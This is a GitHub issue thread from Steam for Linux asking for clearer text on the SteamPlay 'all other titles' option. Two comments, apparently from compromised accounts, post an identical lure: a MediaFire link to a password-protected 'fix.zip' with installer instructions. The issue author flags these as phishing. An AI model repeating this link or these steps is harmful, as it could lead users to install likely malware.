### ISSUE TITLE
[UI Improvement] Enable SteamPlay for all other titles description missing info

### ISSUE THREAD

**Issue by Lunatik00** [ValveSoftware/steam-for-linux#11210]
I have seen a few posts about how people are under the impression that toggling this option that says "Enable SteamPlay for all other titles" includes native games, I understand how for most gamers that use linux this is not an issue and we understand the option, that the first option to "Enable SteamPlay for supported titles" specifies the tool is for games made for other operating systems, but I think the second option should also add this info, something like "if you want to use SteamPlay for native games you have to toggle it for that game", or the option saying something like "Enable SteamPlay for all other non native titles", this is to avoid the misunderstanding that is caused by the "all titles" part of the option.

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lunatik00** [comment]
Can someone erase that fake response with a phishing link? Please, no one should download that link or follow those instructions, never download something like that, the repo for your distro is the trusted source for your tools.

**Comment by kisak-valve** [comment]
Hello @Lunatik00, this issue is already being tracked at #7877. Closing as a duplicate.

**Comment by Lunatik00** [comment]
Thanks, I seek it and didn't found it, also, it is a text change, it's has been 3 years since that post,I know about priorities, but with the steam deck it should be a priority to be as clear as possible.

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Lunatik00** [comment]
And another automated phishing attempt @kisak-valve I have reported the apparent originator account, the 2 comments are from compromised accounts, the originator has a few empty repos and has posted the same link in the most recent issue of both accounts
